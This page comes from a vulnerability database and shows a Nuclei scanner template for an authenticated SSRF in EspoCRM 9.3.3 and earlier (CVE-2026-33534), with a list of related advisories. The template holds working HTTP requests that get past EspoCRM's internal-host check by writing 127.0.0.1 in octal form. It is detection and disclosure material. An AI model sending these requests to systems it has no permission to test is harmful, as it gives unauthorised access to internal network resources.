Lucene search
K

EspoCRM <= 9.3.3 - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Authenticated SSRF in EspoCRM <=9.3.3 allows access to internal resources via fromImageUrl.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Server-Side Request Forgery in Espocrm
8 May 202617:22
githubexploit
ATTACKERKB
CVE-2026-33534
13 Apr 202619:20
attackerkb
Circl
CVE-2026-33534
8 May 202614:59
circl
CNNVD
EspoCRM 代码问题漏洞
13 Apr 202600:00
cnnvd
CVE
CVE-2026-33534
13 Apr 202619:20
cve
Cvelist
CVE-2026-33534 EspoCRM has authenticated SSRF via internal-host validation bypass using alternative IPv4 notation
13 Apr 202619:20
cvelist
Exploit DB
EspoCRM 9.3.3 - SSRF
27 May 202600:00
exploitdb
EUVD
EUVD-2026-22079
13 Apr 202619:20
euvd
NVD
CVE-2026-33534
13 Apr 202620:16
nvd
Packet Storm
📄 EspoCRM 9.3.3 Server-Side Request Forgery
29 May 202600:00
packetstorm
Rows per page
id: CVE-2026-33534

info:
  name: EspoCRM <= 9.3.3 - Server-Side Request Forgery
  author: EntroVyx
  severity: medium
  description: |
    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint.
  impact: |
    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
  remediation: |
    Upgrade to version 9.3.4 or later.
  reference:
    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2026-33534
    epss-score: 0.01978
    epss-percentile: 0.78104
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: espocrm
    product: espocrm
  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json

        {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
        internal: true

  - raw:
      - |
        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Content-Type: application/json

        {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f2dc5b247a3801b2c1e1d77bface7aa1e2d0dc0206d30ad6ebbb997935483abd022100e2be7b434135d1fa8210f0ea86144a628a50c932289b28c2e32de8cb2176add3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 May 2026 14:59Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.3
EPSS0.01978
SSVC
17